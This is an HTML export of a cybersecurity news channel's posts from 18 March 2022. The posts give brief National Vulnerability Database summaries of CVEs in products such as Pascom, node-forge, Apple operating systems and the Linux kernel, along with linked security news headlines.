<strong>‼ CVE-2021-43961 ‼</strong><br><br><code>Sonatype Nexus Repository Manager 3.36.0 allows HTML Injection.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-43961">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message service" id="message-1081">

      <div class="body details">
18 March 2022
      </div>

     </div>

     <div class="message default clearfix" id="message39186">

      <div class="pull_left userpic_wrap">

       <div class="userpic userpic4" style="width: 42px; height: 42px">

        <div class="initials" style="line-height: 42px">
?
        </div>

       </div>

      </div>

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 07:22:21">
07:22
       </div>

       <div class="from_name">
🛡 Cybersecurity &amp; Privacy news 🛡 
       </div>

       <div class="text">
<strong>‼ CVE-2022-26965 ‼</strong><br><br><code>In Pluck 4.7.16, an admin user can use the theme upload functionality at /admin.php?action=themeinstall to perform remote code execution.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26965">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39187">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 07:22:22">
07:22
       </div>

       <div class="text">
<strong>‼ CVE-2022-27240 ‼</strong><br><br><code>scheme/webauthn.c in Glewlwyd SSO server 2.x before 2.6.2 has a buffer overflow associated with a webauthn assertion.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-27240">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39188">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 07:22:23">
07:22
       </div>

       <div class="text">
<strong>‼ CVE-2021-45966 ‼</strong><br><br><code>An issue was discovered in Pascom Cloud Phone System before 7.20.x. In the management REST API, /services/apply in exd.pl allows remote attackers to execute arbitrary code via shell metacharacters.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-45966">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39189">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 07:22:24">
07:22
       </div>

       <div class="text">
<strong>‼ CVE-2021-45967 ‼</strong><br><br><code>An issue was discovered in Pascom Cloud Phone System before 7.20.x. A configuration error between NGINX and a backend Tomcat server leads to a path traversal in the Tomcat server, exposing unintended endpoints.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-45967">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39190">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 07:22:25">
07:22
       </div>

       <div class="text">
<strong>‼ CVE-2021-45868 ‼</strong><br><br><code>In the Linux kernel before 5.15.3, fs/quota/quota_tree.c does not validate the block number in the quota tree (on disk). This can, for example, lead to a kernel/locking/rwsem.c use-after-free if there is a corrupted quota file.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-45868">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39191">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 07:22:27">
07:22
       </div>

       <div class="text">
<strong>‼ CVE-2021-45968 ‼</strong><br><br><code>An issue was discovered in xmppserver jar in the XMPP Server component of the JIve platform, as used in Pascom Cloud Phone System before 7.20.x (and in other products). An endpoint in the backend Tomcat server of the Pascom allows SSRF, a related issue to CVE-2019-18394.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-45968">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39192">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 07:22:28">
07:22
       </div>

       <div class="text">
<strong>‼ CVE-2022-27191 ‼</strong><br><br><code>golang.org/x/crypto/ssh before 0.0.0-20220314234659-1baeb1ce4c0b in Go through 1.16.15 and 1.17.x through 1.17.8 allows an attacker to crash a server in certain circumstances involving AddHostKey.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-27191">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix" id="message39193">

      <div class="pull_left userpic_wrap">

       <div class="userpic userpic4" style="width: 42px; height: 42px">

        <div class="initials" style="line-height: 42px">
?
        </div>

       </div>

      </div>

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 09:22:21">
09:22
       </div>

       <div class="from_name">
🛡 Cybersecurity &amp; Privacy news 🛡 
       </div>

       <div class="text">
<strong>‼ CVE-2021-22571 ‼</strong><br><br><code>A local attacker could read files from some other users&apos; SA360 reports stored in the /tmp folder during staging process before the files are loaded in BigQuery. We recommend upgrading to version 1.0.3 or above.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-22571">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39194">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 09:22:22">
09:22
       </div>

       <div class="text">
<strong>‼ CVE-2021-45834 ‼</strong><br><br><code>An attacker can upload or transfer files of dangerous types to the OpenDocMan 1.4.4 portal via add.php using MIME-bypass, which may be automatically processed within the product&apos;s environment or lead to arbitrary code execution.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-45834">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39195">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 09:22:23">
09:22
       </div>

       <div class="text">
<strong>‼ CVE-2021-45835 ‼</strong><br><br><code>The Online Admission System 1.0 allows an unauthenticated attacker to upload or transfer files of dangerous types to the application through documents.php, which may be used to execute malicious code or lead to code execution.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-45835">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39196">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 09:22:24">
09:22
       </div>

       <div class="text">
<strong>‼ CVE-2022-24655 ‼</strong><br><br><code>A stack overflow vulnerability exists in the upnpd service in Netgear EX6100v1 201.0.2.28, CAX80 2.1.2.6, and DC112A 1.0.0.62, which may lead to the execution of arbitrary code without authentication.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-24655">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix" id="message39197">

      <div class="pull_left userpic_wrap">

       <div class="userpic userpic4" style="width: 42px; height: 42px">

        <div class="initials" style="line-height: 42px">
?
        </div>

       </div>

      </div>

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 11:13:36">
11:13
       </div>

       <div class="from_name">
🛡 Cybersecurity &amp; Privacy news 🛡 
       </div>

       <div class="text">
<strong>🕴 The Road Ahead for Cyber and Infrastructure Security 🕴</strong><br><br><code>Despite cost, it&apos;s time to focus on securing legacy systems and physical infrastructure along with digital systems.</code><br><br><a href="https://www.darkreading.com/vulnerabilities-threats/the-road-ahead-for-cyber-and-infrastructure-security-">📖 Read</a><br><br>via &quot;<em>Dark Reading</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39198">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 11:22:27">
11:22
       </div>

       <div class="text">
<strong>‼ CVE-2022-24595 ‼</strong><br><br><code>Automotive Grade Linux Kooky Koi 11.0.0, 11.0.1, 11.0.2, 11.0.3, 11.0.4, and 11.0.5 is affected by Incorrect Access Control in usr/bin/afb-daemon. To exploit the vulnerability, an attacker should send a well-crafted HTTP (or WebSocket) request to the socket listened by the afb-daemon process. No credentials nor user interactions are required.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-24595">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39199">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 11:22:29">
11:22
       </div>

       <div class="text">
<strong>‼ CVE-2022-0742 ‼</strong><br><br><code>Memory leak in icmp6 implementation in Linux Kernel 5.13+ allows a remote attacker to DoS a host by making it go out-of-memory via icmp6 packets of type 130 or 131. We recommend upgrading past commit 2d3916f3189172d5c69d33065c3c21119fe539fc.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-0742">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix" id="message39200">

      <div class="pull_left userpic_wrap">

       <div class="userpic userpic4" style="width: 42px; height: 42px">

        <div class="initials" style="line-height: 42px">
?
        </div>

       </div>

      </div>

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 11:58:01">
11:58
       </div>

       <div class="from_name">
🛡 Cybersecurity &amp; Privacy news 🛡 
       </div>

       <div class="text">
<strong>❌ Google Blows Lid Off Conti, Diavol Ransomware Access-Broker Ops ❌</strong><br><br><code>Researchers have exposed the work of Exotic Lily, a full-time cybercriminal initial-access group that uses phishing to infiltrate organizations’ networks for further malicious activity.</code><br><br><a href="https://threatpost.com/google-conti-diavol-ransomware-access-broker/178981/">📖 Read</a><br><br>via &quot;<em>Threat Post</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39201">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 12:09:45">
12:09
       </div>

       <div class="text">
<strong>🗓️ Workaround offered for unpatched HTML-to-PDF rendering vulnerability 🗓️</strong><br><br><code>Security flaws exposed in popular dompdf PHP library</code><br><br><a href="https://portswigger.net/daily-swig/workaround-offered-for-unpatched-html-to-pdf-rendering-vulnerability">📖 Read</a><br><br>via &quot;<em>The Daily Swig</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix" id="message39202">

      <div class="pull_left userpic_wrap">

       <div class="userpic userpic4" style="width: 42px; height: 42px">

        <div class="initials" style="line-height: 42px">
?
        </div>

       </div>

      </div>

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 13:22:35">
13:22
       </div>

       <div class="from_name">
🛡 Cybersecurity &amp; Privacy news 🛡 
       </div>

       <div class="text">
<strong>‼ CVE-2022-24772 ‼</strong><br><br><code>Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. Prior to version 1.3.0, RSA PKCS#1 v1.5 signature verification code does not check for tailing garbage bytes after decoding a `DigestInfo` ASN.1 structure. This can allow padding bytes to be removed and garbage data added to forge a signature when a low public exponent is being used. The issue has been addressed in `node-forge` version 1.3.0. There are currently no known workarounds.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-24772">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39203">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 13:22:36">
13:22
       </div>

       <div class="text">
<strong>‼ CVE-2022-24771 ‼</strong><br><br><code>Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. Prior to version 1.3.0, RSA PKCS#1 v1.5 signature verification code is lenient in checking the digest algorithm structure. This can allow a crafted structure that steals padding bytes and uses unchecked portion of the PKCS#1 encoded message to forge a signature when a low public exponent is being used. The issue has been addressed in `node-forge` version 1.3.0. There are currently no known workarounds.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-24771">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39204">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 13:22:37">
13:22
       </div>

       <div class="text">
<strong>‼ CVE-2022-24773 ‼</strong><br><br><code>Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. Prior to version 1.3.0, RSA PKCS#1 v1.5 signature verification code does not properly check `DigestInfo` for a proper ASN.1 structure. This can lead to successful verification with signatures that contain invalid structures but a valid digest. The issue has been addressed in `node-forge` version 1.3.0. There are currently no known workarounds.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-24773">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix" id="message39205">

      <div class="pull_left userpic_wrap">

       <div class="userpic userpic4" style="width: 42px; height: 42px">

        <div class="initials" style="line-height: 42px">
?
        </div>

       </div>

      </div>

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 14:13:49">
14:13
       </div>

       <div class="from_name">
🛡 Cybersecurity &amp; Privacy news 🛡 
       </div>

       <div class="text">
<strong>🕴 Satellite Networks Worldwide at Risk of Possible Cyberattacks, FBI &amp; CISA Warn 🕴</strong><br><br><code>Agencies provide mitigation steps to protect satellite communication (SATCOM) networks amid &quot;current geopolitical situation.&quot;</code><br><br><a href="https://www.darkreading.com/vulnerabilities-threats/satellite-networks-worldwide-at-risk-of-possible-cyberattacks-fbi-cisa-warn">📖 Read</a><br><br>via &quot;<em>Dark Reading</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39206">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 14:28:20">
14:28
       </div>

       <div class="text">
<strong>❌ Sandworm APT Hunts for ASUS Routers with Cyclops Blink Botnet ❌</strong><br><br><code>The Russian-speaking APT behind the NotPetya attacks and the Ukrainian power grid takedown could be setting up for additional sinister attacks, researchers said.</code><br><br><a href="https://threatpost.com/sandworm-asus-routers-cyclops-blink-botnet/178986/">📖 Read</a><br><br>via &quot;<em>Threat Post</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix" id="message39207">

      <div class="pull_left userpic_wrap">

       <div class="userpic userpic4" style="width: 42px; height: 42px">

        <div class="initials" style="line-height: 42px">
?
        </div>

       </div>

      </div>

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 14:59:06">
14:59
       </div>

       <div class="from_name">
🛡 Cybersecurity &amp; Privacy news 🛡 
       </div>

       <div class="text">
<strong>⚠ S3 Ep74: Cybercrime busts, Apple patches, Pi Day, and disconnect effects [Podcast] ⚠</strong><br><br><code>Latest episode - listen now!</code><br><br><a href="https://nakedsecurity.sophos.com/2022/03/17/s3-ep74-cybercrime-busts-apple-patches-pi-day-and-disconnect-effects-podcast/">📖 Read</a><br><br>via &quot;<em>Naked Security</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix" id="message39208">

      <div class="pull_left userpic_wrap">

       <div class="userpic userpic4" style="width: 42px; height: 42px">

        <div class="initials" style="line-height: 42px">
?
        </div>

       </div>

      </div>

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 15:22:37">
15:22
       </div>

       <div class="from_name">
🛡 Cybersecurity &amp; Privacy news 🛡 
       </div>

       <div class="text">
<strong>‼ CVE-2022-24637 ‼</strong><br><br><code>Open Web Analytics (OWA) before 1.7.4 allows an unauthenticated remote attacker to obtain sensitive user information, which can be used to gain admin privileges by leveraging cache hashes. This occurs because files generated with &apos;&lt;?php (instead of the intended &quot;&lt;?php sequence) aren&apos;t handled by the PHP interpreter.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-24637">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39209">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 15:22:39">
15:22
       </div>

       <div class="text">
<strong>‼ CVE-2021-39046 ‼</strong><br><br><code>IBM Business Automation Workflow 18.0, 19.0, 20.0, and 21.0 and IBM Business Process Manager 8.5 and 8.6 stores user credentials in plain clear text which can be read by a lprivileged user. IBM X-Force ID: 214346.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-39046">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39210">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 15:22:41">
15:22
       </div>

       <div class="text">
<strong>‼ CVE-2021-29899 ‼</strong><br><br><code>IBM Engineering Requirements Quality Assistant prior to 3.1.3 could allow an authenticated user to cause a denial of service. IBM X-Force ID: 207413.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-29899">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39211">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 15:29:07">
15:29
       </div>

       <div class="text">
<strong>⚠ OpenSSL patches infinite-loop DoS bug in certificate verification ⚠</strong><br><br><code>When it comes to writing loops in your code... never sit on the fence!</code><br><br><a href="https://nakedsecurity.sophos.com/2022/03/18/openssl-patches-infinite-loop-dos-bug-in-certificate-verification/">📖 Read</a><br><br>via &quot;<em>Naked Security</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39212">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 15:32:10">
15:32
       </div>

       <div class="text">
<strong>🔏 Friday Five 3/18 🔏</strong><br><br><code>How HIPAA can help mitigate cyberattacks, killing the password, and more - catch up on the infosec news of the week with the Friday Five!</code><br><br><a href="https://digitalguardian.com/blog/friday-five-3/18">📖 Read</a><br><br>via &quot;&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39213">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 15:43:52">
15:43
       </div>

       <div class="text">
<strong>🕴 Security Teams Struggle to Get Started With Zero Trust 🕴</strong><br><br><code>Nearly a third of respondents in a Dark Reading survey on endpoint security strategy say zero trust is too confusing to implement.</code><br><br><a href="https://www.darkreading.com/edge-threat-monitor/security-teams-struggle-to-get-started-with-zero-trust">📖 Read</a><br><br>via &quot;<em>Dark Reading</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39214">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 15:58:10">
15:58
       </div>

       <div class="text">
<strong>❌ DarkHotel APT Targets Wynn, Macao Hotels to Rip Off Guest Data ❌</strong><br><br><code>A DarkHotel phishing campaign breached luxe hotel networks, including Wynn Palace and the Grand Coloane Resort in Macao, a new report says.</code><br><br><a href="https://threatpost.com/darkhotel-apt-wynn-macao-hotels/178989/">📖 Read</a><br><br>via &quot;<em>Threat Post</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix" id="message39215">

      <div class="pull_left userpic_wrap">

       <div class="userpic userpic4" style="width: 42px; height: 42px">

        <div class="initials" style="line-height: 42px">
?
        </div>

       </div>

      </div>

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 17:13:54">
17:13
       </div>

       <div class="from_name">
🛡 Cybersecurity &amp; Privacy news 🛡 
       </div>

       <div class="text">
<strong>🕴 Menlo Security: Less Than Three in 10 Organizations Are Equipped to Combat Growing Wave of Web-Based Cyber Threats 🕴</strong><br><br><code>Report finds that 62 percent of IT decision makers have suffered a browser-based attack in the past 12 months.</code><br><br><a href="https://www.darkreading.com/cloud/menlo-security-less-than-three-in-10-organizations-are-equipped-to-combat-growing-wave-of-web-based-cyber-threats">📖 Read</a><br><br>via &quot;<em>Dark Reading</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39216">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 17:13:55">
17:13
       </div>

       <div class="text">
<strong>🕴 A Chance to Raise Shields Right 🕴</strong><br><br><code>CISA&apos;s &quot;Shields Up&quot; alert provides urgency — and opportunity — for supply chain conversations.</code><br><br><a href="https://www.darkreading.com/omdia/a-chance-to-raise-shields-right">📖 Read</a><br><br>via &quot;<em>Dark Reading</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39217">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 17:13:56">
17:13
       </div>

       <div class="text">
<strong>🕴 CyCognito Launches Exploit Intelligence 🕴</strong><br><br><code>Risk intelligence solution provides insight, visibility, and guidance to identify, prioritize, and remediate vulnerabilities like Log4j</code><br><br><a href="https://www.darkreading.com/attacks-breaches/cycognito-launches-exploit-intelligence">📖 Read</a><br><br>via &quot;<em>Dark Reading</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39218">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 17:22:44">
17:22
       </div>

       <div class="text">
<strong>‼ CVE-2022-22611 ‼</strong><br><br><code>An out-of-bounds read was addressed with improved input validation. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, iTunes 12.12.3 for Windows, watchOS 8.5, macOS Monterey 12.3. Processing a maliciously crafted image may lead to arbitrary code execution.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22611">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39219">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 17:22:46">
17:22
       </div>

       <div class="text">
<strong>‼ CVE-2022-22617 ‼</strong><br><br><code>A logic issue was addressed with improved state management. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. An application may be able to gain elevated privileges.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22617">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39220">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 17:22:47">
17:22
       </div>

       <div class="text">
<strong>‼ CVE-2022-22656 ‼</strong><br><br><code>An authentication issue was addressed with improved state management. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. A local attacker may be able to view the previous logged in user’s desktop from the fast user switching screen.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22656">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39221">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 17:22:49">
17:22
       </div>

       <div class="text">
<strong>‼ CVE-2022-25605 ‼</strong><br><br><code>Multiple Authenticated Stored Cross-Site Scripting (XSS) vulnerabilities discovered in WP-DownloadManager WordPress plugin (versions &lt;= 1.68.6). Vvulnerable parameters &amp;download_path, &amp;download_path_url, &amp;download_page_url.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-25605">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39222">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 17:22:50">
17:22
       </div>

       <div class="text">
<strong>‼ CVE-2022-22618 ‼</strong><br><br><code>This issue was addressed with improved checks. This issue is fixed in watchOS 8.5, iOS 15.4 and iPadOS 15.4. A user may be able to bypass the Emergency SOS passcode prompt.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22618">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39223">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 17:22:51">
17:22
       </div>

       <div class="text">
<strong>‼ CVE-2022-22626 ‼</strong><br><br><code>An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. Processing a maliciously crafted AppleScript binary may result in unexpected application termination or disclosure of process memory.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22626">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39224">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 17:22:53">
17:22
       </div>

       <div class="text">
<strong>‼ CVE-2021-30771 ‼</strong><br><br><code>An out-of-bounds write was addressed with improved input validation. This issue is fixed in macOS Big Sur 11.4, iOS 14.6 and iPadOS 14.6, watchOS 7.5, tvOS 14.6. Processing a maliciously crafted font file may lead to arbitrary code execution.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-30771">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39225">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 17:22:55">
17:22
       </div>

       <div class="text">
<strong>‼ CVE-2022-27243 ‼</strong><br><br><code>An issue was discovered in MISP before 2.4.156. app/View/Users/terms.ctp allows Local File Inclusion via the custom terms file setting.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-27243">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39226">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 17:22:56">
17:22
       </div>

       <div class="text">
<strong>‼ CVE-2022-25603 ‼</strong><br><br><code>Authenticated (author or higher user role) Stored Cross-Site Scripting (XSS) vulnerability discovered in MaxGalleria WordPress plugin (versions 6.2.5).</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-25603">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39227">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 17:22:57">
17:22
       </div>

       <div class="text">
<strong>‼ CVE-2022-22671 ‼</strong><br><br><code>An authentication issue was addressed with improved state management. This issue is fixed in iOS 15.4 and iPadOS 15.4. A person with physical access to an iOS device may be able to access photos from the lock screen.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22671">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39228">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 17:22:58">
17:22
       </div>

       <div class="text">
<strong>‼ CVE-2022-22586 ‼</strong><br><br><code>An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in macOS Monterey 12.2. A malicious application may be able to execute arbitrary code with kernel privileges.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22586">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39229">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 17:22:59">
17:22
       </div>

       <div class="text">
<strong>‼ CVE-2022-22666 ‼</strong><br><br><code>A memory corruption issue was addressed with improved validation. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, watchOS 8.5. Processing a maliciously crafted image may lead to heap corruption.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22666">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39230">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 17:23:00">
17:23
       </div>

       <div class="text">
<strong>‼ CVE-2022-22596 ‼</strong><br><br><code>A memory corruption issue was addressed with improved validation. This issue is fixed in watchOS 8.5, iOS 15.4 and iPadOS 15.4. An application may be able to execute arbitrary code with kernel privileges.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22596">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39231">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 17:23:01">
17:23
       </div>

       <div class="text">
<strong>‼ CVE-2022-22603 ‼</strong><br><br><code>An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in Xcode 13.3. Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22603">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39232">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 17:23:02">
17:23
       </div>

       <div class="text">
<strong>‼ CVE-2022-1011 ‼</strong><br><br><code>A flaw use after free in the Linux kernel FUSE filesystem was found in the way user triggers write(). A local user could use this flaw to get some unauthorized access to some data from the FUSE filesystem and as result potentially privilege escalation too.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-1011">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39233">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 17:23:03">
17:23
       </div>

       <div class="text">
